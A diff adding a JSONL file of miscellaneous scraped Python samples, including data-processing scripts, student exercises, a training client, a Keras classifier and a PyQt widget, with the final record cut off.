diff --git "a/232.jsonl" "b/232.jsonl" new file mode 100644--- /dev/null +++ "b/232.jsonl" @@ -0,0 +1,675 @@ +{"seq_id":"611271314","text":"# -*- coding: UTF-8 -*-\n#简单的求取分帧后假设对应的plc同样分帧,求取主轴负载的均值,最终会输出一个数据集主轴负载的所有分帧平均值和标准差\n\nimport pandas as pd\nimport os\n\ndef filesplit(pathname,filename,targetfile):\n #pathname--sensor文件夹绝对路径 filename--对应的plc文件绝对路径 targetfile--目标文件绝对路径\n df = pd.read_csv(filename)\n filelist = os.listdir(pathname)\n filelist.sort(key= lambda x:int(x[:-4]))\n spinload_list = []\n for somefile in filelist:\n filepath = os.path.join(pathname,somefile)\n dk = pd.read_csv(filepath)\n length_window = 12800 #train01 train02 12800 train03 9600 这里处理与sensor分帧相同\n count_window = int(dk.shape[0]/length_window)\n dh = df[df.csv_no==int(somefile.split('.')[0])].reset_index(drop=True)\n baseline = dh.shape[0]//count_window\n print(count_window)\n for i in range(0,count_window): \n dl = dh.iloc[i*baseline:(i+1)*baseline,:]\n spindle_mean = dl['spindle_load'].mean()\n spindle_std = dl['spindle_load'].std()\n spinload_list.append([spindle_mean,spindle_std])\n result_list = pd.DataFrame(spinload_list)\n result_list.to_csv(targetfile,index=None,header=None)\n\n#filesplit('/data/01/sensor','/data/01/plc.csv','/feature/plc01.csv')\n#filesplit('/data/02/sensor','/data/02/plc.csv','/feature/plc02.csv')\n#filesplit('/data/03/sensor','/data/03/plc.csv','/feature/plc03.csv')\n\n\n\n\n \n\n","sub_path":"Tool_RUL_Prediction/code/plc_divide.py","file_name":"plc_divide.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"629574141","text":"print(\"\\n===== NO 1 =======\")\n\nlist_anka=[]\nfor i in range(1,101):\n if(i %3 == 0):\n list_anka.append(i)\n\nfor i in range(len(list_anka)):\n print(list_anka[i],end=\" \")\n\n\n\n\n\n\n\nprint(\"\\n===== NO 2 =======\")\n#no 2\nbil=[]\nk = 0\nwhile(True):\n n = int(input(\"Input Data : \"))\n bil.append(n)\n cek = input(\"Input Lagi(y/n) : \")\n if(cek == 'y'):\n k+=1\n else:\n break\n\nfor i in range(len(bil)):\n print(bil[i], end=\", \")\n\nprint(\"\\n===== NO 3 =======\")\n#no 3\n\nipk=[]\nfor i in range(10):\n in_ip = float(input(\"Input ipk : \"))\n ipk.append(in_ip)\n\njml = 0; rata_rata = 0\nmaximum = ipk[0]; minimum = ipk[0]\nfor i in range(len(ipk)):\n print(ipk[i], end=\" \")\n jml = jml + ipk[i]\n\n if minimum > ipk[i]:\n minimum = ipk[i]\n \n if maximum < ipk[i]:\n maximum = ipk[i]\n\nprint(\"\\nmax = \",maximum,\"min = \",minimum,\"rata-rata = \",jml/len(ipk))","sub_path":"daspro_9/latihanlist.py","file_name":"latihanlist.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"652955328","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\ndef load(message_filepath, categories_filepath):\n \"\"\"\n Arguments:\n messages_filepath: path to messages csv\n categories_filepath: path to categories csv\n Output:\n df: loaded data as pandas Dataframe merged on key 'id'\n \"\"\"\n messages = pd.read_csv(message_filepath)\n categories = pd.read_csv(categories_filepath)\n return pd.merge(messages, categories, on='id')\n\ndef clean_data(df):\n \"\"\"\n Arguments:\n df: raw data pandas Dataframe\n Outputs:\n df: cleaned pandas dataframe\n \"\"\"\n # split categories into seperate columns by ';'\n categories = df['categories'].str.split(';', expand=True)\n # select first row\n row = categories.iloc[0,:]\n # extract list of new column names\n category_columns = row.apply(lambda s : str(s)[:-2])\n # assign new columns names\n categories.columns = category_columns\n for column in categories:\n # set each value to be the last character of the string\n # convert column to numeric\n categories[column] = categories[column].apply(lambda s : int(str(s)[-1]))\n # drop the original categroies column from 'df'\n df.drop(labels=['categories'], axis=1, inplace=True)\n df = pd.concat([df, categories], axis=1, join='inner')\n df.drop_duplicates(inplace=True)\n return df\n\ndef save_data(df, save_file):\n \"\"\"\n Arguments:\n df: cleaned data in pandas df\n save_file: destination filepath\n \"\"\"\n engine = create_engine('sqlite:///'+ save_file)\n df.to_sql('DisasterResponse', engine, index=False, if_exists='replace')\n pass\n\ndef main():\n \"\"\"\n ETL PIPELINE\n 1. extract data (from .csv)\n 2. clean and pre-process data\n 3. Load data into SQLite database\n \"\"\"\n if len(sys.argv) == 4:\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'.format(messages_filepath, categories_filepath))\n df = load(messages_filepath, categories_filepath)\n print('Cleaning data...')\n df = clean_data(df)\n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n print('Cleaned data saved to database!')\n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\nif __name__ == '__main__':\n main()\n","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"473777334","text":"#!/usr/bin/python3\n\nimport os\nimport argparse\nfrom pprint import pprint\n\nimport clang.check\nimport clang.tidy\nimport clang.format\n\n\ndef main(project_dir, silent=False):\n files = ['world_type.h', 'simulation.cpp', 'p3.cpp', 'simulation.h']\n format_dir = os.path.join(project_dir, 'formatted')\n\n clang.format.generate_formatted_files(project_dir, format_dir, files, silent=silent)\n\n clang_check_score = 0\n\n functions = clang.check.parse_functions_new(format_dir, files, silent=silent)\n clang.check.parse_comments(functions, silent=silent)\n\n subroutine_count = 0\n long_function_count = 0\n\n for func_prototype, func in functions.items():\n if func.name != 'main' and func.len >= 1:\n subroutine_count += 1\n if func.len >= 120:\n long_function_count += 1\n\n clang_check_score += min(3, subroutine_count // 5)\n clang_check_score += max(0, 3 - long_function_count)\n\n if not silent:\n print('\\nsubroutines: %d, long functions: %d' % (subroutine_count, long_function_count))\n print('clang-check score: %d' % clang_check_score)\n\n clang_tidy_warnings, clang_tidy_warnings_count = clang.tidy.parse_warnings_new(project_dir, files, silent=silent)\n clang_tidy_score = 0\n\n if clang_tidy_warnings_count <= 10:\n clang_tidy_score += 2\n elif clang_tidy_warnings_count <= 25:\n clang_tidy_score += 1\n if len(clang_tidy_warnings) <= 3:\n clang_tidy_score += 2\n elif len(clang_tidy_warnings) <= 6:\n clang_tidy_score += 1\n if not silent:\n pprint(clang_tidy_warnings)\n print('\\nclang-tidy score: %d' % clang_tidy_score)\n\n if silent:\n print('%d,%d' % (clang_check_score, clang_tidy_score))\n\n\nparser = argparse.ArgumentParser(description='Project 3 Code Checker.')\nparser.add_argument('--silent', action='store_true')\nparser.add_argument('project_dir', type=str, nargs=1)\nargs = parser.parse_args()\nmain(args.project_dir[0], silent=args.silent)\n","sub_path":"p3/codestyle.py","file_name":"codestyle.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131715186","text":"import json\n\nfrom torch.multiprocessing import ProcessExitedException\n\nfrom projectcode.training import pickled_train_and_evaluate\nfrom loguru import logger\nimport time\nimport main_config\nimport requests\nfrom projectcode.server.database import (\n get_task,\n pickle_load_from_str,\n get_incomplete_task,\n Task,\n pickle_to_str,\n get_own_inprogress_task,\n connect,\n get_inprogress_task,\n)\nfrom projectcode.datasets.cifar10 import CifarDataset\nimport datetime\nfrom google.api_core.exceptions import ServiceUnavailable\n\n\nclass Client:\n def __init__(self, client_id: str, client_stream: str = \"tpu\"):\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9\"\n }\n self.client_id = client_id\n self.ds = None\n if \"GPU\" in client_id:\n self.client_stream = \"gpu\"\n else:\n self.client_stream = client_stream\n\n if self.client_stream == 'tpu':\n import torch_xla\n\n def do_task(self, task: Task):\n\n spec = pickle_load_from_str(task.pkl_data)\n\n return pickled_train_and_evaluate(spec=spec, client_id=self.client_id)\n\n def report_task(self, task: Task, results: dict = None, success: bool = True):\n connect()\n\n if get_task(key = task.key) is None:\n logger.warning(\"Task completed or failed, but not longer exists on the server\")\n else:\n if success:\n if task.state == \"complete\":\n logger.warning(\"Task already completed by another\")\n else:\n\n\n task.state = \"complete\"\n task.result_pkl_data = pickle_to_str(obj=results)\n task.save()\n else:\n if task.extra_workers != 0:\n logger.info(\n \"There are other workers on this task. Attempting to restart the same task.\"\n )\n logger.info(\"Successfully Reported Failure of Task\")\n\n else:\n task.state = \"incomplete\"\n task.save()\n logger.info(\"Successfully Reported Failure of Task\")\n\n return\n\n def get_task(self) -> Task:\n connect()\n\n task = get_own_inprogress_task(self.client_id, client_stream=self.client_stream)\n if task is None:\n\n task = get_incomplete_task(client_stream=self.client_stream)\n if task is None:\n # here, we get a task that's already being worked on so that if the first worker fails, the second worker\n # has already started working on the task and has made progress\n logger.info(\"Trying to Double Up\")\n task = get_inprogress_task(client_stream=self.client_stream)\n if task is not None:\n task.extra_workers = 1\n task.save()\n logger.info(\"Doubling up on a task\")\n\n else:\n logger.info(\"Resuming own incomplete task\")\n\n if task is not None:\n\n task.state = \"inprogress\"\n task.assigned_to = self.client_id\n task.assigned_at = datetime.datetime.now()\n\n logger.info(task)\n\n task.save()\n\n return task\n\n def prepare(self):\n self.ds = CifarDataset()\n\n def run(self):\n\n self.prepare()\n\n logger.info(\"Beginning training loop\")\n\n while True:\n logger.info(\"Getting Task\")\n\n task = self.get_task()\n\n if task is None:\n logger.info(\n \"No Task Found. Retrying in %i seconds\"\n % main_config.client.wait_time\n )\n time.sleep(main_config.client.wait_time)\n else:\n\n # TODO: convert to context manager to guarantee reporting of task failure\n\n sucess = False\n\n try:\n results = self.do_task(task)\n logger.info(\"Completed Execution of Task\")\n self.report_task(task, results)\n logger.info(\"Reported Task Completion\")\n sucess = True\n\n except Exception as e:\n\n if type(e) == ProcessExitedException:\n logger.warning(\"Task failed due to Torch Multiprocessing\")\n else:\n logger.warning(\"Task failed\")\n\n self.report_task(task, success=False)\n\n logger.exception(\"Logging Exception\")\n\n if type(e) == ProcessExitedException:\n pass\n elif type(e) == ServiceUnavailable:\n pass\n else:\n raise\n\n finally:\n\n if not sucess:\n logger.warning(\"Task failed\")\n self.report_task(task, success=False)\n","sub_path":"projectcode/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476622887","text":"# __author__ = ‘penny‘\n# -*-coding:utf-8-*-\n\nimport unittest,time,HTMLTestRunner\nfrom config import globalparam\n\ncase_dir = globalparam.prj_path + './src/test/case/'\ndiscover = unittest.defaultTestLoader.discover(case_dir,pattern='start_login.py',top_level_dir=None)\n\n\nif __name__ == '__main__':\n now = time.strftime(\"%Y-%m-%d %H_%M_%S\")\n filename = globalparam.prj_path + './report/testreport/' + now + 'tesult.html'\n fp = open(filename, 'wb')\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp,\n title=u'启通宝登录测试报告',\n description=u'环境:window7 浏览器:firefox')\n runner.run(discover)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"86547517","text":"import math\r\n\r\nclass contribution_calculator_contest:\r\n score = []\r\n normalized_score = []\r\n contribution_score = []\r\n points_per_question = 0.2\r\n mean = 0\r\n standard_deviation = 0\r\n no_of_participants = 0\r\n\r\n codeforces = 0.25\r\n codechef = 0.15\r\n hackerearth = 0.2\r\n\r\n def __init__(self, score=[], value_per_question = 0.25, site=\"\"):\r\n self.score = list(score)\r\n self.no_of_participants = len(score)\r\n self.points_per_question = value_per_question\r\n\r\n if(site == \"codeforces\"):\r\n self.points_per_question = self.codeforces\r\n if(site == \"hackerearth\"):\r\n self.points_per_question = self.hackerearth\r\n if(site == \"codechef\"):\r\n self.points_per_question = self.codechef\r\n\r\n def get_mean(self):\r\n total_score = 0\r\n for individual_score in self.score:\r\n total_score += individual_score\r\n self.mean = total_score/self.no_of_participants\r\n\r\n def get_standard_deviation(self):\r\n total_score_squared = 0\r\n for individual_score in self.score:\r\n total_score_squared = total_score_squared + individual_score**2\r\n variance = total_score_squared/self.no_of_participants - self.no_of_participants*(self.mean**2)\r\n self.standard_deviation = math.sqrt(variance)\r\n\r\n def get_normalized_score(self):\r\n self.get_mean()\r\n self.get_standard_deviation()\r\n\r\n if(self.standard_deviation < 0.75):\r\n self.standard_deviation = 0.75\r\n\r\n self.normalized_score = list(self.score);\r\n for participant in range(self.no_of_participants):\r\n self.normalized_score[participant] = (self.score[participant] - self.mean)/self.standard_deviation\r\n \r\n def get_contribution_score(self):\r\n if(self.no_of_participants == 0):\r\n return []\r\n\r\n self.get_normalized_score()\r\n standardised_score = list(self.normalized_score)\r\n minimum = 0.33 - min(standardised_score)\r\n for participant in range(self.no_of_participants):\r\n standardised_score[participant] = (standardised_score[participant] + minimum)*0.75\r\n \r\n contribution_score = standardised_score\r\n for participant in range(self.no_of_participants):\r\n contribution_score[participant] = standardised_score[participant] + self.points_per_question * self.score[participant]\r\n \r\n return contribution_score\r\n\r\n","sub_path":"contribution_calculator_contest.py","file_name":"contribution_calculator_contest.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"346741353","text":"import ownrandom\nimport matplotlib.pyplot as plt\nimport math\nfrom random import randint\n\ndef euler(r, T, Ts, part=1):\n return -r*(T-Ts)/part\n\ndef tabulator(T, Ts, r, part):\n counter = 0\n x = [counter]\n y = [T]\n while round(T,3) > Ts:\n counter += 1\n t = euler(r, T, Ts, part)\n T += t\n x.append(counter)\n y.append(T)\n return x, y\n\n\ndef time_tabulator(T, Ts, r, minutes):\n x = []\n y = []\n x.append(0)\n y.append(T)\n for i in range(1, minutes):\n t = round(euler(r, T, Ts),2)\n T += t\n x.append(i)\n y.append(T)\n return x, y\n\n\ndef delta(y, y_pidbir):\n delta = 0\n for i in range(0, len(y)):\n delta += (y[i]-y_pidbir[i])**2\n delta = math.sqrt(delta)\n return delta\n\nT = 85\nTs = 20\nr = 0.12\nx_pidbir = list(i for i in range(0, 15))\ny_pidbir = [77.7, 75.1, 73, 71.1, 69.4, 67.8, 66.4, 64.7, 63.4, 62.1, 61, 59.9, 58.7, 57.8, 56.6]\n\n\nprint(\"Завдання 1\")\nx_1, y_1 = tabulator(T, Ts, r, 1)\nplt.plot(x_1, y_1)\nplt.show()\nprint(\"Завдання 2\")\nx_2, y_2 = tabulator(T, Ts, r, 2)\nplt.plot(x_2, y_2)\nplt.show()\nprint(\"Завдання 3\")\nr = 0.033333\nx_3, y_3 = time_tabulator(77.7, 20, r, 15)\n\nplt.plot(x_3, y_3)\nplt.plot(x_pidbir, y_pidbir, \"ro\")\nplt.show()\n","sub_path":"2 курс/Modelling/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"633967465","text":"import read\nimport collections\n\ndf = read.load_data()\nstr_h_df=''\nfor h in df['headline']:\n h = str(h)\n h1=h.lower()\n str_h_df=str_h_df + ' ' + h1\n#print(str_h_df)\n#print(collections.Counter(str_h_df).most_common(3))\nwords = str_h_df.split(\" \")\nc= collections.Counter(words)\nresult = c.most_common(100)\nprint(result)","sub_path":"count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"61837046","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 27 13:58:01 2018\n\n@author: Benson\n\"\"\"\n\n\n# error example\namount = 10000 # 總消費金額\nnumOfPeople = input(\"請輸入人數:\") # input() 永遠返回字串 string\nnumOfPeople = int(numOfPeople) # 將 string 轉成 integer\n\nprint( \"每人須付 $\" + str(amount / numOfPeople) )\nprint( \"繼續運行程式\" )\n\n\n\n\n# using if to avoid error\namount = 10000 # 總金額 10000\nnumOfPeople = int( input(\"請輸入人數:\") ) # 如果用戶輸入非數字字母,程式到這句還是會出錯!\nif numOfPeople > 0:\n print( \"每人須付 $\" + str(amount / numOfPeople) )\nelse:\n print( \"人數必須為整數,且大於零!\" )\n \nprint( \"繼續運行程式\" ) \n\n\n\n\n\n# try-except method\ntry:\n amount = 10000\n numOfPeople = int( input(\"請輸入人數:\") )\n amountPerPerson = amount / numOfPeople\n print( \"每人須付 $\" + str(amountPerPerson) )\nexcept:\n print( \"人數必須為整數,且大於零!\" )\n\nprint( \"繼續運行程式\" )\n\n\n\n\n# get error message\ntry:\n 1/0\nexcept Exception as e: # 取得錯誤碼,儲存到變數 e\n print( \"發生了錯誤:\" + str(e) ) # 輸出錯誤碼\n\n\n\n# nested try-except\ntry:\n try:\n 1/0\n except:\n print(\"Caught by inner\")\n\n print(\"Continue\")\nexcept:\n print(\"Caught by outer\")\n\n\n\n\n# exercise\n\n\n\n\n\n","sub_path":"b教材-程式檔案/03 Python 語法3/1.13 try-except.py","file_name":"1.13 try-except.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"312726421","text":"import json\nimport numpy as np\nimport math\nimport argparse\nimport torch\nimport ConcaveHull as ch\nfrom torch.utils.data import DataLoader\nimport edge_imageprovider as image_provider\nfrom functools import reduce\nimport operator\nimport torch.nn as nn\nimport sklearn.metrics as sm\nimport cv2\nimport torch.nn.functional as F\nfrom skimage.io import imsave\n\n\n\ndef compute_iou_and_accuracy(arrs, edge_mask1):\n intersection = cv2.bitwise_and(arrs, edge_mask1)\n union = cv2.bitwise_or(arrs, edge_mask1)\n\n intersection_sum = np.sum(intersection)\n union_sum = np.sum(union)\n\n iou = intersection_sum / union_sum\n\n total = np.sum(arrs)\n correct_predictions = intersection_sum\n\n accuracy = correct_predictions / total\n # print(iou, accuracy)\n\n return iou, accuracy\n\n\n\n return train_loader\n\ndef sort_clockwise(poly):\n coords = poly[:]\n center = tuple(map(operator.truediv, reduce(lambda x, y: map(operator.add, x, y), coords), [len(coords)] * 2))\n coords = sorted(coords, key=lambda coord: (-225 - math.degrees(\n math.atan2(*tuple(map(operator.sub, coord, center))[::-1]))) % 360)\n\n return coords\n\n\n\ndef uniformsample(pgtnp_px2, newpnum):\n pnum, cnum = pgtnp_px2.shape\n assert cnum == 2\n\n idxnext_p = (np.arange(pnum, dtype=np.int32) + 1) % pnum\n pgtnext_px2 = pgtnp_px2[idxnext_p]\n edgelen_p = np.sqrt(np.sum((pgtnext_px2 - pgtnp_px2) ** 2, axis=1))\n edgeidxsort_p = np.argsort(edgelen_p)\n\n # two cases\n # we need to remove gt points\n # we simply remove shortest paths\n if pnum > newpnum:\n edgeidxkeep_k = edgeidxsort_p[pnum - newpnum:]\n edgeidxsort_k = np.sort(edgeidxkeep_k)\n pgtnp_kx2 = pgtnp_px2[edgeidxsort_k]\n assert pgtnp_kx2.shape[0] == newpnum\n return pgtnp_kx2\n # we need to add gt points\n # we simply add it uniformly\n else:\n edgenum = np.round(edgelen_p * newpnum / np.sum(edgelen_p)).astype(np.int32)\n for i in range(pnum):\n if edgenum[i] == 0:\n edgenum[i] = 1\n\n # after round, it may has 1 or 2 mismatch\n edgenumsum = np.sum(edgenum)\n if edgenumsum != newpnum:\n\n if edgenumsum > newpnum:\n\n id = -1\n passnum = edgenumsum - newpnum\n while passnum > 0:\n edgeid = edgeidxsort_p[id]\n if edgenum[edgeid] > passnum:\n edgenum[edgeid] -= passnum\n passnum -= passnum\n else:\n passnum -= edgenum[edgeid] - 1\n edgenum[edgeid] -= edgenum[edgeid] - 1\n id -= 1\n else:\n id = -1\n edgeid = edgeidxsort_p[id]\n edgenum[edgeid] += newpnum - edgenumsum\n\n assert np.sum(edgenum) == newpnum\n\n psample = []\n for i in range(pnum):\n pb_1x2 = pgtnp_px2[i:i + 1]\n pe_1x2 = pgtnext_px2[i:i + 1]\n\n pnewnum = edgenum[i]\n wnp_kx1 = np.arange(edgenum[i], dtype=np.float32).reshape(-1, 1) / edgenum[i];\n\n pmids = pb_1x2 * (1 - wnp_kx1) + pe_1x2 * wnp_kx1\n psample.append(pmids)\n\n psamplenp = np.concatenate(psample, axis=0)\n return psamplenp\n\n\ndef get_hull(edge_logits):\n test = edge_logits\n test_0 = test[:, :]\n test_1 = test[:, :]\n\n points_pred = []\n\n for i in range(len(test_1)):\n for j in range(len(test_1[0])):\n if test_1[i][j] > 0:\n points_pred.append([i, j])\n\n points_pred = np.asarray(points_pred)\n\n hull = ch.concaveHull(points_pred, 3)\n # print(hull)\n return hull\n\n\ndef convert_hull_to_cv(hull, w, h):\n\n original_hull = []\n for i in hull:\n original_hull.append([i[1], i[0]])\n return original_hull\n\ndef clockwise_check(points):\n sum = 0\n for i in range(len(points)):\n if i != len(points) - 1:\n sum_x = points[i+1][0] - points[i][0]\n sum_y = points[i+1][1] + points[i][1]\n sum += sum_x * sum_y\n else:\n sum_x = points[0][0] - points[i][0]\n sum_y = points[0][1] + points[i][1]\n sum += sum_x * sum_y\n if sum > 0:\n return True\n else:\n return False\n\n\n\n\n\ncomplete_data = []\ncomplete_data1 = []\nptk = 0\nd_iou1 = dict()\nd_iou_c1 = dict()\nd_accuracy1 = dict()\nd_accuracy_c1 = dict()\n\npred_cm = []\ngt_cm = []\n\n\ndef testing_hull(poly_logits,class_prob, bbox):\n \n vertex_logits = poly_logits\n # edge_logits = torch.sigmoid(edge_logits)\n # edge_logits = edge_logits[0,0,:,:]\n class_prob = F.log_softmax(class_prob)\n class_prob = torch.squeeze(class_prob)\n # print(class_prob)\n class_label, index = torch.topk(class_prob, 1)\n classes = ['Hole(Physical)','Character Line Segment', 'Character Component','Picture','Decorator','Library Marker', 'Boundary Line', 'Physical Degradation']\n \n\n poly_logits = torch.sigmoid(poly_logits)\n poly_logits = poly_logits[0,0,:,:]\n\n arrs2 = np.zeros((30, 60), np.uint8)\n for j in range(len(poly_logits)):\n for k in range((len(poly_logits[j]))):\n j1 = math.floor(j)\n k1 = math.floor(k)\n if poly_logits[j][k]>0.51:\n arrs2[j1][k1]= 255\n\n\n kernel7 = np.ones((2,2),np.uint8)\n kernel2 = np.ones((3,3),np.uint8)\n # kernel1 = np.ones((2,2),np.uint8)\n # arrs2 = cv2.morphologyEx(arrs2, cv2.MORPH_OPEN, kernel2)\n arrs2 = cv2.morphologyEx(arrs2, cv2.MORPH_CLOSE, kernel2)\n # arrs2 = cv2.morphologyEx(arrs2, cv2.MORPH_CLOSE, kernel7)\n\n kernel2 = np.ones((3,3),np.uint8)\n\n borders55 = np.zeros((30, 60), np.float32)\n\n im, contours, hierarchy = cv2.findContours(arrs2,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n max_area=0\n largest_contour=-1\n for i in range(len(contours)):\n cont=contours[i]\n area=cv2.contourArea(cont)\n if(area>max_area):\n max_area=area\n largest_contour=i\n\n h_contour=contours[largest_contour]\n cv2.polylines(borders55, np.int32([h_contour]),True,[1], thickness = 1)\n \n\n arrs1 = torch.from_numpy(borders55)\n hull = get_hull(arrs1)\n\n hull = np.asarray(hull)\n hull = hull.tolist()\n\n w = bbox[0][2]\n h = bbox[0][3]\n\n original_hull = convert_hull_to_cv(hull, w, h)\n # original_hull14 = convert_hull_to_cv(hull14, w, h)\n\n total_points = 100\n original_hull = sort_clockwise(original_hull)\n original_hull = uniformsample(np.asarray(original_hull), total_points).astype(int).tolist()\n \n\n if clockwise_check(original_hull) == False:\n original_hull = original_hull[::-1]\n\n if clockwise_check(original_hull) == False:\n print(\"mismatch!!!!!!!!!!\")\n return original_hull","sub_path":"configs/baselines/DACN/test_hull.py","file_name":"test_hull.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476186423","text":"items = input().split(\", \")\r\ncommand = input()\r\n\r\nwhile command != \"Craft!\":\r\n action, item = command.split(\" - \")\r\n\r\n if action == \"Collect\":\r\n if item not in items:\r\n items.append(item)\r\n\r\n elif action == \"Drop\":\r\n if item in items:\r\n items.remove(item)\r\n\r\n elif action == \"Combine Items\":\r\n old, new = item.split(\":\")\r\n if old in items:\r\n x = items.index(old)\r\n items.insert(x+1, new)\r\n else:\r\n continue\r\n\r\n elif action == \"Renew\":\r\n if item in items:\r\n x = items.index(item)\r\n y = items.pop(x)\r\n items.append(item)\r\n command = input()\r\nprint(\", \".join(items))","sub_path":"05. Lists Advanced Exercises/10. Inventory.py","file_name":"10. Inventory.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"190384398","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 7 10:48:26 2018\r\n\r\n@author: dragz17\r\n\"\"\"\r\n\r\n# Importing the Keras libraries and packages\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dropout\r\n\r\n#dummy_y = ['anjing', 'kucing']\r\n\r\n#def baseline_model():\r\n# create model\r\nmodel = Sequential()\r\nmodel.add(Flatten(input_shape=(32,32,3)))\r\nmodel.add(Dense(200, input_dim=3072, activation='relu'))\r\nmodel.add(Dropout(0.9))\r\nmodel.add(Dense(200, activation='relu'))\r\nmodel.add(Dropout(0.9))\r\nmodel.add(Dense(200, activation='relu'))\r\nmodel.add(Dropout(0.9))\r\nmodel.add(Dense(1, activation='sigmoid'))\r\n# Compile model\r\nmodel.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\r\n\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\ntrain_datagen = ImageDataGenerator(rescale = 1./255, \r\n shear_range = 0.2, \r\n zoom_range = 0.2, \r\n horizontal_flip = True)\r\n\r\ntest_datagen = ImageDataGenerator(rescale = 1./255)\r\n\r\ntraining_set = train_datagen.flow_from_directory('./train', \r\n target_size = (32, 32), batch_size = 32, class_mode = 'binary')\r\ntest_set = test_datagen.flow_from_directory('./test1', target_size = (32, 32), batch_size = 32, class_mode = 'binary')\r\n\r\n\r\n\r\nmodel.fit_generator(training_set, steps_per_epoch = 24999, epochs = 100, validation_data = test_set, validation_steps = 12500)\r\n\r\n\r\n#estimator = KerasClassifier(build_fn=baseline_model, epochs=200, batch_size=5, verbose=0)\r\n\r\n#kfold = KFold(n_splits=10, shuffle=True, random_state=None)\r\n#results = cross_val_score(estimator, X, dummy_y, cv=kfold)\r\n#print(\"Accuracy: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\r\n \r\n\r\n","sub_path":"deep learning-python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"592108787","text":"# Based largely on the logic of this Stackoverflow answer:\n# http://stackoverflow.com/a/16996439\n\nnumber = int(input(\"Number to factorise: \"))\n\ndividend = number\ndivisor = 2\n\nwhile divisor * divisor <= dividend:\n\twhile dividend % divisor == 0:\n\t\tdividend //= divisor\n\tdivisor += 1\n\nprint(dividend)","sub_path":"factoriser.py","file_name":"factoriser.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"392189769","text":"from PyQt5.QtWidgets import QWidget, QLineEdit, QDialogButtonBox, QLabel, QPushButton, QGridLayout, QCheckBox\nfrom PyQt5.QtCore import pyqtSignal\n\n\nclass Printwidget(QWidget):\n sendCommand = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super(Printwidget, self).__init__(parent)\n self.atr_btn_us = QPushButton(text=\"US\", objectName=\"atr_us\")\n self.data_btn_us = QPushButton(text=\"US\", objectName=\"atr_us\")\n self.data_to_print = QLineEdit(self)\n self.attributes_field = QLineEdit(self)\n self.buttonBox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(lambda: self.close())\n self.W = QCheckBox(text=\"Szerokość\")\n self.H = QCheckBox(text=\"Wysokość\")\n self.N = QCheckBox(text=\"Nagłówkowa\")\n self.I = QCheckBox(text=\"Negatyw\")\n self.U = QCheckBox(text=\"Ukryte\")\n self.E = QCheckBox(text=\"Kreskowy\")\n self.Q = QCheckBox(text=\"QR\")\n self.G = QCheckBox(text=\"Grafika\")\n self.delete = QCheckBox(text=\"Czyszczenie pól po wysłaniu\")\n self.auto_complete = QCheckBox(text=\"Dodać automatycznie 'L\\\"\\\"' ?\")\n self.open_print_btn = QPushButton(\"Rozpoczęcie wydruku\")\n self.close_print_btn = QPushButton(\"Zakończenie wydruku\")\n\n self.atr_btn_us.clicked.connect(lambda: self.attributes_field.setText(self.attributes_field.text() + \"\\x1f\"))\n self.data_btn_us.clicked.connect(lambda: self.data_to_print.setText(self.data_to_print.text() + \"\\x1f\"))\n 